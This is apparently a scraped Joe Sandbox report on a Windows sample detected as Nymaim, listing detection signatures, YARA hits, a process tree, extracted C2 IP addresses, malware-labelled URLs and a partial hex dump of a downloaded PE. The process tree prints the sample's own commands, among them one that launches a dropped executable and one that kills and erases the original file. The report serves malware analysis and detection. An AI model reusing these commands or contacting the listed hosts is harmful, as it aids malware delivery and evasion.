Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	715158
MD5:	526fde9e61b1b4835885973331fa1616
SHA1:	ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256:	093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
Tags:	exe
Infos:

Detection

Nymaim

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Nymaim

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

May check the online IP address of the machine

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Downloads executable code via HTTP

Enables debug privileges

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Uses taskkill to terminate processes

Creates a process in suspended mode (likely to inject code)

Classification

×

Process Tree

System is w10x64

file.exe (PID: 6136 cmdline: C:\Users\user\Desktop\file.exe MD5: 526FDE9E61B1B4835885973331FA1616)

WerFault.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 1680 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 1324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 5144 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Cleaner.exe (PID: 4628 cmdline: "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)

WerFault.exe (PID: 5216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 6044 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6080 cmdline: taskkill /im "file.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 60 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.file.exe.21d0e67.30.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.18.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.13.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.7.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.23.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.5.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.4.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.21.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.19.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.11.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.31.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.file.exe.2210000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.26.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.9.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.16.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.25.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.8.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.30.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.24.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.28.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.17.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.14.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.6.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.31.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.26.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.7.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.11.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.21.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.24.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.32.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.15.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.14.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.10.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.2.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.13.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.4.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.10.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.27.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.32.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.5.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.29.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.8.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.29.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.28.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.6.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.20.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.18.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.20.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.12.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.22.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.19.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.22.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.25.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.2.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.9.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.15.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.17.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.file.exe.2210000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.27.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.12.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.23.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.16.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 62 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

Antivirus detection for URL or domain

Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	URL Reputation: Label: malware
Source: http://171.22.30.106/library.php	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: ^\C:\car.pdb source: file.exe
Source:	Binary string: C:\car.pdb source: file.exe

Networking

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

DNS query: name: iplogger.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 208.67.104.97
Source: Malware configuration extractor	IPs: 85.31.46.167

Source: Joe Sandbox View

ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:42:20 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 